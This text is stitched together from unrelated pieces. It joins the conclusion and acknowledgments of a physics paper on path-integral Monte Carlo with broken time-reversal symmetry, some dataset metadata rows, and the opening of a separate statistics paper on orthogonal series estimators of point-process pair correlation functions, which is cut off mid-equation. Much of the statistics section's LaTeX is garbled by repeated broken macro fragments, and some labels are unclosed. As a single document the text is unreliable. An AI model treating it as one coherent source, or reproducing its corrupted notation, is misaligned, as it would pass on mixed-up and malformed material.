As the computing need of PIMC scales as a moderate power, typically $N^3$, of the system size, and no attempt has yet been
made to parallelize the code, we expect we can routinely simulate dozens of particles by the method we elaborated.
\section{Conclusion and Outlook}
\label{conclusion}
We have explored the feasibility of the path-integral Monte Carlo simulation of systems
that do not obey time-reversal symmetry under periodic boundary conditions.
Technically, this requires the use of the single-particle thermal density matrix
that is appropriate for the boundary conditions in the presence of a magnetic field.
We have derived several equivalent closed-form expressions for this purpose.
The multi-slice sampling algorithm was modified for the case where the
weight of a path is determined by the magnitude of the density matrix, which does
not obey a convolution property.
We have illustrated the use of these techniques in the simulation of two-dimensional Yukawa systems,
where time-reversal symmetry is broken by the Coriolis-force,
as commonly done in experiments on cold atomic systems.
We have shown that in spite of the crudeness of the phase-fixing we used, the
interaction-driven transition between a crystalline phase and a correlated liquid
can be captured qualitatively by a PIMC simulation.
A comprehensive quantitative study of this system is delegated to future work.
Eventually, fermions that interact by the Coulomb potential are of more fundamental interest.
For such systems the primitive approximation to the action is clearly not an adequate starting point.
More sophisticated approximations exist, but in their current form they rely upon the
consequences of time-reversal invariance.
The development of suitable approximations for the non-time-reversal-invariant case is underway and is
delegated to future publications.
\begin{acknowledgments}
This research was supported by the National Research Development and Innovation Office of Hungary
within the Quantum Technology National Excellence Program (Project No.\ 2017-1.2.1-NKP-2017-00001),
and by the Hungarian Scientific Research Funds No.\ K105149.
We are grateful to the HPC facility at the Budapest University of Technology and Economics.
We thank P\'eter L\'evay and Bal\'azs Het\'enyi for useful discussions.
C.\ T.\ was supported by the Hungarian Academy of Sciences.
H.\ G.\ T.\ acknowledges support from the ``Quantum Computing and Quantum Technologies'' PhD School of
the University of Basel.
\end{acknowledgments}
| 2024-02-18T23:40:09.945Z | 2018-01-30T02:11:39.000Z | algebraic_stack_train_0000 | 1,515 | 9,032 |
|
proofpile-arXiv_065-7445 | 2024-02-18T23:40:10.038Z | 2017-02-07T02:09:34.000Z | algebraic_stack_train_0000 | 1,519 | 2 |
||
proofpile-arXiv_065-7458 | \section{Introduction}
\label{sec:intro}
The pair correlation function is commonly considered the most
informative second-order summary statistic of a spatial point process
\citep{stoyan:stoyan:94,moeller:waagepetersen:03,illian:penttinen:stoyan:stoyan:08}.
Non-parametric estimates of the pair correlation function are useful
for assessing regularity or clustering of a spatial point pattern and
can moreover be used for inferring parametric models for spatial point
processes via minimum contrast estimation
\citep{stoyan:stoyan:96,illian:penttinen:stoyan:stoyan:08}.
Although alternatives exist \citep{yue:loh:13}, kernel estimation
is the by far most popular approach
\citep{stoyan:stoyan:94,moeller:waagepetersen:03,illian:penttinen:stoyan:stoyan:08}
which is closely related to kernel estimation of probability
densities.
Kernel estimation is computationally fast and works well except at small
spatial lags. For spatial lags close to zero, kernel estimators suffer
from strong bias, see e.g.\ the discussion at page 186 in
\cite{stoyan:stoyan:94}, Example~4.7 in
\cite{moeller:waagepetersen:03} and Section 7.6.2 in \cite{baddeley:rubak:turner:15}.
The bias is a major drawback if one attempts
to infer a parametric model from the non-parametric estimate since the
behavior
near zero is important for
determining the right parametric model \citep{jalilian:guan:waagepetersen:13}.
In this paper we adapt orthogonal series density estimators
\citep[see e.g.\ the reviews in][]{hall:87,efromovich:10}
to the estimation of the pair correlation function. We derive unbiased
estimators of the coefficients in an orthogonal series expansion of the
pair correlation function and propose a criterion for choosing a certain
optimal smoothing scheme. In the literature on orthogonal series
estimation of probability densities, the data are usually
assumed to consist of indendent observations from the unknown
target density. In our case the situation is more complicated as the
data used for estimation consist of spatial lags between observed pairs of
points. These lags are neither independent nor identically distributed and the sample of lags is
biased due to edge effects.
We establish consistency and asymptotic normality of our new
orthogonal series estimator and study its performance in a simulation
study and an application to a tropical rain forest data set.
\section{Background
\label{sec:background}
\subsection{Spatial point processes}
We denote by $X$ a point process on ${\mathbb R}^d$, $d \ge 1$, that is, $X$ is
a locally finite random subset of ${\mathbb R}^d$. For $B\subseteq {\mathbb R}^d$, we let $N(B)$
denote the random number of points in $X \cap B$. That $X$ is locally finite
means that $N(B)$ is finite almost surely whenever $B$ is bounded. We
assume that $X$ has an intensity function $\rho$ and a second-order
joint intensity $\rho^{(2)}$ so that for bounded $A,B \subset {\mathbb R}^d$,
\begin{equation}
E\{N(B)\} = \int_B \rho({u}}%{{\mathbf{u}}) {\mathrm{d}} {u}}%{{\mathbf{u}}, \quad
E\{N(A) N(B)\} = \int_{A\cap B} \rho({u}}%{{\mathbf{u}}) {\mathrm{d}} {u}}%{{\mathbf{u}}
+ \int_A \int_B \rho^{(2)}({u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}}) {\mathrm{d}} {u}}%{{\mathbf{u}} {\mathrm{d}}{v}}%{{\mathbf{v}}. \label{eq:moments}
\end{equation}
The pair correlation function $g$ is defined as
$g({u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}}) = \rho^{(2)}({u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}})/\{\rho({u}}%{{\mathbf{u}}) \rho({v}}%{{\mathbf{v}})\}$
whenever $\rho({u}}%{{\mathbf{u}})\rho({v}}%{{\mathbf{v}})>0$ (otherwise we define $g({u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}})=0$).
By \eqref{eq:moments},
\[
\text{cov}\{ N(A), N(B) \} = \int_{A \cap B} \rho({u}}%{{\mathbf{u}}) {\mathrm{d}} {u}}%{{\mathbf{u}} +
\int_{A}\int_{B} \rho({u}}%{{\mathbf{u}})\rho({v}}%{{\mathbf{v}})\big\{ g({v}}%{{\mathbf{v}},{u}}%{{\mathbf{u}}) - 1 \big\} {\mathrm{d}}{u}}%{{\mathbf{u}}{\mathrm{d}}{v}}%{{\mathbf{v}}
\]
for bounded $A,B \subset {\mathbb R}^d$.
Hence, given the intensity function, $g$ determines
the covariances of count variables $N(A)$ and $N(B)$. Further, for
locations $u,v \in {\mathbb R}^d$, $g({u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}})>1$ ($<1$)
implies that the presence of a point at ${v}}%{{\mathbf{v}}$ yields an elevated
(decreased) probability of observing yet another point in a small
neighbourhood of ${u}}%{{\mathbf{u}}$ \cite[e.g.\ ][]{coeurjolly:moeller:waagepetersen:15}.
In this paper we assume that $g$ is isotropic, i.e.\ with
an abuse of notation, $g({u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}})=g(\|{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}\|)$.
Examples of pair correlation functions are shown in Figure~\ref{fig:gfuns}.
\subsection{Kernel estimation of the pair correlation function}
Suppose ${X}}%{\mathbf{X}$ is observed within a bounded observation window $W
\subset {\mathbb R}^d$ and let ${X}}%{\mathbf{X}_W= {X}}%{\mathbf{X} \cap W$. Let $k_b(\cdot)$ be a
kernel of the form $k_b(r)=k(r/b)/b$, where $k$ is a
probability density
and
$b>0$ is the bandwidth.
Then a kernel density
estimator \citep{stoyan:stoyan:94,baddeley:moeller:waagepetersen:00} of $g$ is
\[
\hat{g}_k(r;b) = \frac{1}{{\text{sa}_d} r^{d-1}}
\sum_{{u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}}\in {X}}%{\mathbf{X}_{W}}^{\neq}
\frac{ k_{b}(r - \|{v}}%{{\mathbf{v}} - {u}}%{{\mathbf{u}}\|)}{ \rho({u}}%{{\mathbf{u}}) \rho({v}}%{{\mathbf{v}})|W \cap W_{{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}}|},
\quad r\geq 0,
\]
where ${\text{sa}_d}$ is the surface area of the unit sphere in ${\mathbb R}^d$,
$\sum^{\neq}$ denotes sum over all distinct points,
$1/|W \cap W_{{h}}{%{{\mathbf{h}}}|$, ${h}}{%{{\mathbf{h}} \in {\mathbb R}^d$,
is the translation edge correction factor with
$W_{{h}}{%{{\mathbf{h}}}=\{{u}}%{{\mathbf{u}}-{h}}{%{{\mathbf{h}}: {u}}%{{\mathbf{u}}\in W\}$, and $|A|$ is the volume (Lebesgue measure)
of $A\subset{\mathbb R}^{d}$.
Variations of this include \citep{guan:leastsq:07}
\[
\hat{g}_d(r;b) =\frac{1}{{\text{sa}_d}} \sum_{{u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}}\in {X}}%{\mathbf{X}_{W}}^{\neq}
\frac{ k_{b}(r - \|{v}}%{{\mathbf{v}} - {u}}%{{\mathbf{u}}\|) }{ \|{v}}%{{\mathbf{v}} - {u}}%{{\mathbf{u}}\|^{d-1} \rho({u}}%{{\mathbf{u}}) \rho({v}}%{{\mathbf{v}})|W \cap W_{{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}}|},
\quad r \geq 0 \]
and the bias corrected estimator \citep{guan:leastsq:07}
\[
\hat g_c(r;b) = \hat g_d(r;b) / c(r;b), \quad
c(r;b) = \int_{-b}^{\min\{r,b\}} k_b(t) {\mathrm{d}} t,
\]
assuming $k$ has bounded support $[-1,1]$.
Regarding the choice of kernel,
\cite{illian:penttinen:stoyan:stoyan:08}, p.~230, recommend to use the
uniform kernel $k(r)=\mathbbm{1}(|r|\le 1)/2$, where $\mathbbm{1}(\, \cdot\, )$
denotes the indicator function, but the Epanechnikov kernel $k(r)=(3/4)(1 - r^2)\mathbbm{1}(|r|\leq1)$
is another common choice.
The choice of the bandwidth $b$ highly affects
the bias and variance of the kernel estimator.
In the planar ($d=2$) stationary case,
\cite{illian:penttinen:stoyan:stoyan:08}, p.~236,
recommend $b=0.10/\surd{\hat{\rho}}$ based on practical experience where $\hat{\rho}$ is an estimate
of the constant intensity. The default in \texttt{spatstat} \citep{baddeley:rubak:turner:15}, following
\cite{stoyan:stoyan:94}, is to use
the Epanechnikov kernel with $b=0.15/\surd{\hat{\rho}}$.
\cite{guan:composite:07} and \cite{guan:leastsq:07}
suggest to choose $b$ by composite
likelihood cross validation or by
minimizing an estimate of the mean integrated squared error defined over some interval $I$ as
\begin{equation}\label{eq:mise}
\textsc{mise}(\hat{g}_m, w) ={\text{sa}_d} \int_I
E\big\{ \hat{g}_m(r;b) - g(r)\big\}^2 w(r-{r_{\min}}) {\mathrm{d}} r,
\end{equation}
where $\hat g_{m}$, $m=k,d,c$, is one of the aforementioned kernel
estimators, $w\ge 0$ is a weight function and ${r_{\min}} \ge 0$.
With $I=(0,R)$, $w(r)=r^{d-1}$ and $r_{\min}=0$,
\cite{guan:leastsq:07} suggests to estimate the mean integrated squared error by
\begin{equation}\label{eq:ywcv}
M(b) = {\text{sa}_d} \int_{0}^{R}
\big\{ \hat{g}_{m}(r;b) \big\}^2 r^{d-1} {\mathrm{d}} r
-2 \sum_{\substack{{u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}}\in X_{W}\\ \|{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}\| \le R}}^{\neq}
\frac{\hat{g}_{m}^{-\{{u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}}\}}(\|{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}\|;b)}{
\rho({u}}%{{\mathbf{u}}) \rho({v}}%{{\mathbf{v}})|W \cap W_{{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}}|},
\end{equation}
where $\hat{g}_m^{-\{{u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}}\}}$, $m=k,d,c$, is defined as $\hat g_m$
but based on the reduced data $({X}}%{\mathbf{X} \setminus \{{u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}}\}) \cap
W$. \cite{loh:jang:10} instead use a spatial bootstrap for
estimating \eqref{eq:mise}. We return to \eqref{eq:ywcv} in Section~\ref{sec:miseest}.
\section{Orthogonal series estimation}\label{sec:ose}
\subsection{The new estimator}
For an $R>0$, the new orthogonal series estimator of $g(r)$,
$0\le {r_{\min}} < r < {r_{\min}} + R$, is based on an orthogonal series
expansion of $g(r)$ on $({r_{\min}}, {r_{\min}} + R)$ :
\begin{equation}\label{eq:expansion}
g(r) = \sum_{k=1}^{\infty} \theta_k \phi_k(r-{r_{\min}}),
\end{equation}
where $\{\phi_k\}_{k \ge 1}$ is an orthonormal basis of functions on
$(0, R)$ with respect to some weight function $w(r) \ge 0$, $r \in (0, R)$.
That is, $\int_{0}^R \phi_k(r) \phi_l(r) w(r) {\mathrm{d}} r = \mathbbm{1}(k=l)$
and the coefficients in the expansion are given by $\theta_k
=\int_{0}^{R} g(r+{r_{\min}}) \phi_k(r) w(r) {\mathrm{d}} r$.
For the cosine basis, $w(r)=1$ and $\phi_1(r) = 1/\surd{R}$, $\phi_k(r)= (2/R)^{1/2} \cos\{ (k - 1) \pi r/R \}$, $k \ge 2$. Another example is the Fourier-Bessel basis with $w(r)= r^{d-1}$
and $ \phi_k(r)=2^{1/2}J_{\nu}\left(r \alpha_{\nu,k}/R
\right)r^{-\nu}/\{ RJ_{\nu+1}(\alpha_{\nu,k})\}$, $k \ge 1$,
where $\nu=(d-2)/2$, $J_{\nu}$ is the Bessel function of the first kind of
order $\nu$, and $\{\alpha_{\nu,k}\}_{k=1}^\infty$ is the sequence of
successive positive roots of $J_{\nu}(r)$.
An estimator of $g$ is obtained by replacing the $\theta_k$ in \eqref{eq:expansion}
by unbiased estimators and
truncating or smoothing the infinite sum. A similar approach has a
long history in the context of non-parametric estimation of
probability densities, see e.g.\ the review in \citet{efromovich:10}.
For $\theta_k$ we propose the estimator
\begin{equation}\label{eq:thetahat}
\hat \theta_k=\frac{1}{{\text{sa}_d}} \sum_{\substack{{u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}}\in {X}}%{\mathbf{X}_{W}\\ {r_{\min}} < \|{u}}%{{\mathbf{u}} - {v}}%{{\mathbf{v}}\| < {r_{\min}}+R}}^{\neq}
\frac{\phi_k(\|{v}}%{{\mathbf{v}} -{u}}%{{\mathbf{u}}\|-{r_{\min}}) w(\|{v}}%{{\mathbf{v}} -{u}}%{{\mathbf{u}}\|-{r_{\min}})}{\rho({u}}%{{\mathbf{u}}) \rho({v}}%{{\mathbf{v}}) \|{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}\|^{d-1}|W \cap W_{{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}}|},
\end{equation}
which is unbiased by the second order Campbell formula, see Section~S2 of the supplementary
material.
This type of estimator has some similarity to the coefficient estimators used for probability
density estimation but is based on spatial lags ${v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}$ which are
not independent nor identically distributed. Moreover the estimator is
adjusted for the possibly inhomogeneous intensity $\rho$ and corrected
for edge effects.
The orthogonal series estimator is finally of the form
\begin{equation}\label{eq:orthogpcf}
\hat g_o(r; b) = \sum_{k=1}^{\infty} b_k \hat \theta_k \phi_k(r-{r_{\min}}),
\end{equation}
where $b=\{ b_k \}_{k=1}^\infty$ is a smoothing/truncation scheme.
The simplest smoothing scheme is $b_k=\mathbbm{1}[k \le K]$ for some cut-off
$K\geq1$. Section~\ref{sec:smoothing} considers several other smoothing schemes.
\subsection{Variance of $\hat \theta_k$}
\label{sec:varthetak}
The factor $\|{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}\|^{d-1}$ in \eqref{eq:thetahat} may
cause problems when $d>1$ where the presence of two
very close points in $X_W$ could imply
division by a quantity close to zero.
The expression for the variance of $\hat \theta_k$ given in Section~S2 of the supplementary
material
indeed shows that the variance is not finite
unless $g(r)w(r-{r_{\min}})/r^{d-1}$ is bounded for ${r_{\min}}<r<{r_{\min}}+R$. If ${r_{\min}}>0$ this is always satisfied for bounded $g$. If ${r_{\min}}=0$ the condition is still satisfied in case of the Fourier-Bessel basis and bounded $g$.
For the cosine basis $w(r)=1$ so if ${r_{\min}}=0$ we need
the boundedness of $g(r)/r^{d-1}$.
If ${X}}%{\mathbf{X}$ satisfies a hard core condition
(i.e.\ two points in ${X}}%{\mathbf{X}$ cannot be closer than some
$\delta>0$), this is trivially satisfied. Another
example is a determinantal point process \citep{LMR15} for
which $g(r)=1-c(r)^2$ for a correlation function $c$. The boundedness
is then e.g.\ satisfied if $c(\cdot)$ is the
Gaussian ($d \le 3$) or exponential ($d \le 2$) correlation function.
In practice, when using the cosine basis, we take ${r_{\min}}$ to be a small positive number to avoid issues with infinite variances.
\subsection{Mean integrated squared error and smoothing schemes}
\label{sec:smoothing}
The orthogonal series estimator \eqref{eq:orthogpcf}
has the mean integrated squared error
\begin{align}
\textsc{mise}\big(\hat{g}_{o},w\big)
&= {\text{sa}_d} \int_{{r_{\min}}}^{{r_{\min}}+R}
E\big\{ \hat{g}_{o}(r;b) - g(r) \big\}^2 w(r-{r_{\min}}) {\mathrm{d}} r \nonumber \\
&= {\text{sa}_d} \sum_{k=1}^{\infty} E(b_k\hat{\theta}_{k} - \theta_k)^2
= {\text{sa}_d} \sum_{k=1}^{\infty} \big[ b_{k}^2 E\{(\hat{\theta}_{k})^2\}
-2b_k \theta_{k}^2 + \theta_{k}^2 \big]. \label{eq:miseo}
\end{align}
Each term in~\eqref{eq:miseo} is minimized with $b_k$ equal
to \citep[cf.][]{hall:87}
\begin{equation}\label{eq:bstar}
b_{k}^{*} = \frac{\theta_{k}^2}{E\{(\hat{\theta}_{k})^2\} }
=\frac{\theta_{k}^2}{\theta_{k}^2 + \text{var}(\hat{\theta}_{k})},
\quad k\geq0,
\end{equation}
leading to the minimal value ${\text{sa}_d}\sum_{k=1}^{\infty} b_{k}^{*}
\text{var}(\hat{\theta}_{k})$ of the mean integrated square error. Unfortunately, the $b_k^*$ are unknown.
In practice we consider a parametric class of smoothing schemes $b(\psi)$. For practical
reasons we need a finite sum in \eqref{eq:orthogpcf} so one component
in $\psi$ will be a cut-off index $K$ so that $b_k(\psi)=0$ when
$k>K$. The simplest smoothing scheme is
$b_k(\psi)=\mathbbm{1}(k\le K)$. A more refined scheme is
$b_k(\psi)=\mathbbm{1}(k\le K)\hat b_k^*$ where $\hat b_k^* = \widehat{\theta_k^2}/(\hat
\theta_k)^2$ is an estimate of the optimal smoothing coefficient
$b_k^*$ given in \eqref{eq:bstar}. Here $\widehat{\theta_k^2}$
is an asymptotically unbiased estimator of $\theta_k^2$ derived
in Section~\ref{sec:miseest}. For these two smoothing schemes
$\psi=K$. Adapting the scheme suggested by \cite{wahba:81},
we also consider $\psi=(K,c_1,c_2)$, $c_1>0,c_2>1$,
and $b_k(\psi)=\mathbbm{1}(k\le K)/(1 + c_1 k^{c_2})$.
In practice we choose the smoothing parameter $\psi$ by minimizing
an estimate of the mean integrated squared error, see Section~\ref{sec:miseest}.
\subsection{Expansion of $g(\cdot)-1$}\label{sec:g-1}
For large $R$, $g({r_{\min}}+R)$ is typically close to one. However, for the Fourier-Bessel basis,
$\phi_k(R)=0$ for all $k \ge 1$ which implies $\hat g_o({r_{\min}}+R)=0$.
Hence the estimator cannot be consistent for $r={r_{\min}}+R$ and the
convergence of the estimator for $r \in ({r_{\min}},{r_{\min}}+R)$ can be quite
slow as the number of terms $K$ in the estimator increases.
In practice we obtain quicker convergence by applying the Fourier-Bessel
expansion to $g(r)-1=\sum_{k \ge 1} \vartheta_{k} \phi_k(r-{r_{\min}})$
so that the estimator becomes $\tilde g_o(r;b)=1+ \sum_{k=1}^{\infty}
b_k\hat{\vartheta}_{k} \phi_k(r-{r_{\min}})$ where $\hat{\vartheta}_k = \hat
\theta_k - \int_{0}^{{r_{\min}}+R} \phi_k(r) w(r) {\mathrm{d}} r$ is an estimator
of $\vartheta_k = \int_{0}^R \{ g(r+{r_{\min}})-1 \} \phi_k(r) w(r) {\mathrm{d}}
r$. Note that $\text{var}(\hat{\vartheta}_k)=\text{var}(\hat{\theta}_k)$
and $\tilde g_o(r;b)- E\{\tilde{g}_o(r;b)\}= \hat g_o(r;b)- E\{\hat g_o(r;b)\}$.
These identities imply that the results regarding consistency and asymptotic normality established for $\hat g_o(r;b)$ in Section~\ref{sec:asympresults} are
also valid for $\tilde g_o(r;b)$.
\section{Consistency and asymptotic normality}\label{sec:asympresults}
\subsection{Setting}
To obtain asymptotic results we assume that ${X}}%{\mathbf{X}$ is observed through an increasing sequence of observation windows
$W_n$. For ease of presentation we assume square
observation windows $W_n= \times_{i=1}^d [-n a_i , n a_i]$ for some
$a_i >0$, $i=1,\ldots,d$. More general sequences of windows can be used at the
expense of more notation and assumptions. We also consider an associated sequence
$\psi_n$, $n \ge 1$, of smoothing parameters satisfying conditions to
be detailed in the following. We let $\hat \theta_{k,n}$ and $\hat
g_{o,n}$ denote the estimators of $\theta_k$ and $g$ obtained from
${X}}%{\mathbf{X}$ observed on $W_n$. Thus
\[
\hat \theta_{k,n} = \frac{1}{{\text{sa}_d}|W_n|}
\sum_{\substack{{u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}}\in {X}}%{\mathbf{X}_{W_n}\\ {v}}%{{\mathbf{v}} - {u}}%{{\mathbf{u}} \in B_{r_{\min}}^R}}^{\neq}
\frac{\phi_k(\|{v}}%{{\mathbf{v}} -{u}}%{{\mathbf{u}}\|-{r_{\min}})w(\|{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}\|-{r_{\min}})}{\rho({u}}%{{\mathbf{u}}) \rho({v}}%{{\mathbf{v}}) \|{v}}%{{\mathbf{v}} -{u}}%{{\mathbf{u}}\|^{d-1}e_n({v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}})}),
\]
where
\begin{equation}\label{eq:edge
B_{r_{\min}}^R=\{ {h}}{%{{\mathbf{h}} \in {\mathbb R}^d \mid {r_{\min}} < \|{h}}{%{{\mathbf{h}}\| < {r_{\min}}+R\} \quad \text{and}\quad e_n({h}}{%{{\mathbf{h}})= |W_n
\cap (W_n)_{h}}{%{{\mathbf{h}}|/|W_n|.
\end{equation}
Further,
\[
\hat g_{o,n} (r;b) = \sum_{k=1}^{K_n} b_k(\psi_n) \hat \theta_{k,n} \phi_k(r-{r_{\min}})
= \frac{1}{{\text{sa}_d}|W_n|}
\sum_{\substack{{u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}}\in {X}}%{\mathbf{X}_{W_n}\\ {v}}%{{\mathbf{v}} - {u}}%{{\mathbf{u}} \in B_{r_{\min}}^R}}^{\neq}
\frac{w(\|{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}\|)\varphi_{n}({v}}%{{\mathbf{v}} - {u}}%{{\mathbf{u}},r)}{\rho({u}}%{{\mathbf{u}}) \rho({v}}%{{\mathbf{v}}) \|{v}}%{{\mathbf{v}} -{u}}%{{\mathbf{u}}\|^{d-1}e_n({v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}})|},
\]
where
\begin{equation}\label{eq:hn}
\varphi_{n}({h}}{%{{\mathbf{h}},r) = \sum_{k=1}^{K_n} b_k(\psi_n) \phi_k(\|{h}}{%{{\mathbf{h}}\|-{r_{\min}}) \phi_k(r-{r_{\min}}).
\end{equation}
In the results below we refer to higher order normalized
joint intensities $g^{(k)}$ of ${X}}%{\mathbf{X}$.
Define the $k$'th order joint intensity of $X$ by the identity
\[
E\left\{\sum_{{u}}%{{\mathbf{u}}_1,\ldots,{u}}%{{\mathbf{u}}_k \in {X}}%{\mathbf{X}}^{\neq} \mathbbm{1}( {u}}%{{\mathbf{u}}_1 \in A_1,\ldots,{u}}%{{\mathbf{u}}_k \in A_k) \right\}
= \int_{A_1\times \cdots \times A_k} \rho^{(k)}({v}}%{{\mathbf{v}}_1,\ldots,{v}}%{{\mathbf{v}}_k) {\mathrm{d}}{v}}%{{\mathbf{v}}_1\cdots{\mathrm{d}}{v}}%{{\mathbf{v}}_k
\]
for bounded subsets $A_i \subset {\mathbb R}^d$, $i=1,\ldots,k$, where the
sum is over distinct ${u}}%{{\mathbf{u}}_1,\ldots,{u}}%{{\mathbf{u}}_k$.
We then let $g^{(k)}({v}}%{{\mathbf{v}}_1,\ldots,{v}}%{{\mathbf{v}}_k)=\rho^{(k)}({v}}%{{\mathbf{v}}_1,\ldots,{v}}%{{\mathbf{v}}_k)/\{\rho({v}}%{{\mathbf{v}}_1) \cdots \rho({v}}%{{\mathbf{v}}_k)\}$ and assume with an abuse of notation that the $g^{(k)}$ are translation invariant for $k=3,4$, i.e.\ $g^{(k)}({v}}%{{\mathbf{v}}_1,\ldots,{v}}%{{\mathbf{v}}_k)=g^{(k)}({v}}%{{\mathbf{v}}_2-{v}}%{{\mathbf{v}}_1,\ldots,{v}}%{{\mathbf{v}}_k-{v}}%{{\mathbf{v}}_1)$.
\subsection{Consistency of orthogonal series estimator}
\label{sec:consistency}
Consistency of the orthogonal series estimator can be established under
fairly mild conditions following the approach in \cite{hall:87}.
We first state some conditions that ensure (see Section~S2 of the supplementary
material)
that $\text{var}(\hat \theta_{k,n}) \le C_1/|W_n|$ for some $0<C_1 < \infty$:
\begin{enumerate}
\renewcommand{\theenumi}{\arabic{enumi}}
\renewcommand{\labelenumi}{V\theenumi}
\item \label{cond:rho} There exists $0< \rho_{\min} < \rho_{\max} < \infty$
such that for all ${u}}%{{\mathbf{u}}\in{\mathbb R}^{d}$, $\rho_{\min}\leq \rho({u}}%{{\mathbf{u}})\leq \rho_{\max}$.
\item \label{cond:gandg3} For any ${h}}{%{{\mathbf{h}}, {h}}{%{{\mathbf{h}}_1,{h}}{%{{\mathbf{h}}_2\in {B_\rmin^{R}}$,
$g({h}}{%{{\mathbf{h}}) w(\|{h}}{%{{\mathbf{h}}\|-{r_{\min}}) \leq C_2 \|{h}}{%{{\mathbf{h}}\|^{d-1}$ and $g^{(3)}({h}}{%{{\mathbf{h}}_1,{h}}{%{{\mathbf{h}}_2)\leq C_3$
for constants $C_2,C_3 < \infty$.
\item \label{cond:boundedg4integ} A constant $C_4<\infty$ can be
found such that $\sup_{{h}}{%{{\mathbf{h}}_1,{h}}{%{{\mathbf{h}}_2\in{B_\rmin^{R}}}
\int_{{\mathbb R}^{d}} \Big| g^{(4)}({h}}{%{{\mathbf{h}}_1, {h}}{%{{\mathbf{h}}_3,{h}}{%{{\mathbf{h}}_2+{h}}{%{{\mathbf{h}}_3) - g({h}}{%{{\mathbf{h}}_1)g({h}}{%{{\mathbf{h}}_2)
\Big| {\mathrm{d}}{h}}{%{{\mathbf{h}}_3 \leq C_4$.
\end{enumerate}
The first part of V\ref{cond:gandg3} is needed to ensure finite variances of the $\hat \theta_{k,n}$ and is discussed in detail in Section~\ref{sec:varthetak}. The second part simply requires that $g^{(3)}$ is bounded.
The condition V\ref{cond:boundedg4integ} is a weak dependence condition which is also used for asymptotic normality in Section~\ref{sec:asympnorm} and for estimation of $\theta_k^2$ in Section~\ref{sec:miseest}.
Regarding the smoothing scheme, we assume
\begin{enumerate}
\renewcommand{\theenumi}{\arabic{enumi}}
\renewcommand{\labelenumi}{S\theenumi}
\item $B=\sup_{k,\psi} \big|b_k(\psi)\big|< \infty$ and for all $\psi$,
$\sum_{k=1}^\infty \big|b_k(\psi)\big| <\infty$.
\item $\psi_n \rightarrow \psi^*$ for some $\psi^*$, and
$\lim_{\psi \rightarrow \psi^*} \max_{1 \le k \le m} \big|b_k(\psi)-1\big|=0$
for all $m\geq1$.
\item $|W_n|^{-1} \sum_{k=1}^\infty \big| b_k(\psi_n)\big| \rightarrow 0$.
\end{enumerate}
E.g.\ for the simplest smoothing scheme, $\psi_n = K_n$,
$\psi^*=\infty$ and we assume $K_n/|W_n| \rightarrow 0$.
Assuming the above conditions we now verify that the mean integrated
squared error of $\hat g_{o,n}$ tends to zero as $n \rightarrow
\infty$. By \eqref{eq:miseo}, $\textsc{mise}\big(\hat{g}_{o,n}, w \big)/{\text{sa}_d}
= \sum_{k=1}^{\infty} \big[ b_{k}(\psi_n)^2 \text{var}(\hat{\theta}_{k})+
\theta_{k}^2\{b_k(\psi_n) - 1\}^2 \big]$.
By V1-V3 and S1 the right hand side is bounded by
\[ B C_1 |W_n|^{-1} \sum_{k=1}^\infty \big| b_k(\psi_n)\big| + \max_{1 \le k \le
m}\theta_k^2 \sum_{k=1}^m (b_k(\psi_n)-1)^2 + (B^2+1) \sum_{k=m+1}^\infty
\theta_k^2.
\]
By Parseval's identity, $\sum_{k=1}^{\infty} \theta_k^2 < \infty$.
The last term can thus be made arbitrarily small by choosing $m$
large enough. It also follows that $\theta_k^2$ tends to zero as $k \rightarrow \infty$.
Hence, by S2, the middle term
can be made arbitrarily small by choosing $n$ large enough for any choice of $m$. Finally, the first term can be made arbitrarily small by S3 and choosing $n$ large enough.
\subsection{Asymptotic normality}\label{sec:asympnorm}
The estimators $\hat \theta_{k,n}$ as well as the estimator $\hat g_{o,n}(r;b)$
are of the form
\begin{equation}\label{eq:decomp2}
S_n = \frac{1}{{\text{sa}_d} |W_n|} \sum_{\substack{{u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}}\in {X}}%{\mathbf{X}_{W_n}\\{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}} \in {B_\rmin^{R}}}}^{\neq}
\frac{f_n({v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}})}{\rho({u}}%{{\mathbf{u}})\rho({v}}%{{\mathbf{v}})e_n({v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}})}
\end{equation}
for a sequence of even functions $f_n:{\mathbb R}^d \rightarrow
{\mathbb R}$. We let $\tau^2_n=|W_n|\text{var}(S_n)$.
To establish asymptotic normality of estimators of the form
\eqref{eq:decomp2} we need certain mixing
properties for $X$ as in \cite{waagepetersen:guan:09}. The strong mixing coefficient for the point process $X$
on ${\mathbb R}^d$ is given by~\citep{ivanoff:82,politis:paparoditis:romano:98}
\begin{align*}
\alpha_{\mathbf{X}}(m;a_1,a_2) =
\sup\big\{& \big| \text{pr}(E_1\cap E_2) - \text{pr}(E_1)\text{pr}(E_2) \big|:
E_1\in\mathcal{F}_{X}(B_1), E_2\in\mathcal{F}_{X}(B_2), \\
&|B_1|\leq a_1, |B_2|\leq a_2,
